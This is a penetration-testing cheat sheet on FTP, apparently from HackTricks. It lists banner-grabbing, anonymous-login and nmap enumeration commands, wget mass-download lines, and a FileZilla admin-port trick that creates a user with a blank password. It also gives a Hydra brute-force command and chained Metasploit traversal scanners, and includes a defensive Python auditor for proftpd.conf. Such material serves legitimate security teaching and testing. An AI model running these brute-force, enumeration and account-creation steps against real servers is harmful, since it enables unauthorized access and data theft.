Hacking FTP | How to hack FTP

  • What is FTP:-

The File Transfer Protocol (FTP) is a standard network protocol used for the transfer of computer files between a client and server on a computer network.

Default Port:- 21

Enumeration:-

Banner Grabbing:

nc -vn <IP> 21

openssl s_client -connect crossfit.htb:21 -starttls ftp #Get certificate if any

Anonymous login:-

anonymous : anonymous
anonymous :
ftp : ftp

ftp <IP>
>anonymous
>anonymous
>ls -a # List all files (even hidden ones; yes, they could be hidden)
>binary #Set transmission to binary instead of ascii
>ascii #Set transmission to ascii instead of binary
>bye #exit

Automated:-

Anonymous login and FTP bounce checks are performed by default by nmap with the -sC option, or run:

nmap --script ftp-* -p 21 <ip>

Download all files from FTP:-

wget -m ftp://anonymous:anonymous@10.10.10.98 #Download all
wget -m --no-passive ftp://anonymous:anonymous@10.10.10.98 #Download all

Filezilla Server Vulnerability:-

FileZilla Server usually binds its administrative service (port 14147) to the local interface. If you can create a tunnel from your machine to reach this port, you can connect to it using a blank password and create a new user for the FTP service.

Config files:-

  • ftpusers
  • proftpd.conf
  • ftp.conf
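
As an added example (not from the original post or from HackTricks), this Python script audits the text of a proftpd.conf, one of the config files listed above, for the anonymous access described under "Anonymous login". The sample config and the name audit_proftpd are constructed for illustration, and the check only looks at <Anonymous> and <Limit> blocks.

```python
import re

# Constructed sample proftpd.conf for this demo (not from the page or a real host).
SAMPLE_CONF = """\
ServerName "files"
<Anonymous ~ftp>
  UserAlias anonymous ftp
  <Directory incoming>
    <Limit STOR>
      AllowAll
    </Limit>
  </Directory>
</Anonymous>
"""

# Commands that modify files; WRITE is ProFTPD's group name for them.
WRITE_CMDS = {"WRITE", "STOR", "STOU", "APPE", "DELE", "MKD", "RMD", "RNTO"}

def audit_proftpd(conf_text):
    """Return (line_number, finding) tuples for anonymous-FTP exposure."""
    findings, stack = [], []          # stack: (section, args) of open blocks
    anon_line, write_denied = None, False
    for n, raw in enumerate(conf_text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue                  # blank line or comment
        if m := re.fullmatch(r"</(\w+)>", line):
            if stack:
                stack.pop()
            if m.group(1).lower() == "anonymous" and anon_line is not None:
                if not write_denied:
                    findings.append((anon_line, "no <Limit WRITE> DenyAll in anonymous block"))
                anon_line = None
        elif m := re.fullmatch(r"<(\w+)\s*(.*)>", line):
            name = m.group(1).lower()
            stack.append((name, m.group(2).upper().split()))
            if name == "anonymous":
                anon_line, write_denied = n, False
                findings.append((n, "anonymous login enabled, root " + m.group(2)))
        elif anon_line is not None and stack and stack[-1][0] == "limit":
            cmds = WRITE_CMDS & set(stack[-1][1])
            directly_in_anon = len(stack) > 1 and stack[-2][0] == "anonymous"
            if line.lower() == "denyall" and "WRITE" in cmds and directly_in_anon:
                write_denied = True   # blanket write ban for the whole anonymous tree
            elif line.lower() == "allowall" and cmds:
                findings.append((n, "anonymous write allowed: " + " ".join(sorted(cmds))))
    return findings

if __name__ == "__main__":
    print(*audit_proftpd(SAMPLE_CONF), sep="\n")
```
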

HackTricks Automatic Commands:-

Protocol_Name: FTP    #Protocol Abbreviation if there is one.
Port_Number: 21    #Comma separated if there is more than one.
Protocol_Description: File Transfer Protocol    #Protocol Abbreviation Spelled out

Entry_1:
  Name: Notes
  Description: Notes for FTP
  Note: |
    Anonymous Login
    -bi     <<< so that your put is done via binary

    wget --mirror 'ftp://ftp_user:UTDRSCH53c"$6hys@10.10.10.59'
    ^^to download all dirs and files

    wget --no-passive-ftp --mirror 'ftp://anonymous:anonymous@10.10.10.98'
    if PASV transfer is disabled

    https://book.hacktricks.xyz/pentesting/pentesting-ftp

Entry_2:
  Name: Banner Grab
  Description: Grab FTP Banner via telnet
  Command: telnet -n {IP} 21

Entry_3:
  Name: Cert Grab
  Description: Grab FTP Certificate if existing
  Command: openssl s_client -connect {IP}:21 -starttls ftp

Entry_4:
  Name: nmap ftp
  Description: Anon login and bounce FTP checks are performed
  Command: nmap --script ftp-* -p 21 {IP}

Entry_5:
  Name: Browser Connection
  Description: Connect with Browser
  Note: ftp://anonymous:anonymous@{IP}

Entry_6:
  Name: Hydra Brute Force
  Description: Need Username
  Command: hydra -t 1 -l {Username} -P {Big_Passwordlist} -vV {IP} ftp

Entry_7:
  Name: consolesless mfs enumeration ftp
  Description: FTP enumeration without the need to run msfconsole
  Note: sourced from https://github.com/carlospolop/legion
  Command: msfconsole -q -x 'use auxiliary/scanner/ftp/anonymous; set RHOSTS {IP}; set RPORT 21; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ftp/ftp_version; set RHOSTS {IP}; set RPORT 21; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ftp/bison_ftp_traversal; set RHOSTS {IP}; set RPORT 21; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ftp/colorado_ftp_traversal; set RHOSTS {IP}; set RPORT 21; run; exit' && msfconsole -q -x 'use auxiliary/scanner/ftp/titanftp_xcrc_traversal; set RHOSTS {IP}; set RPORT 21; run; exit'
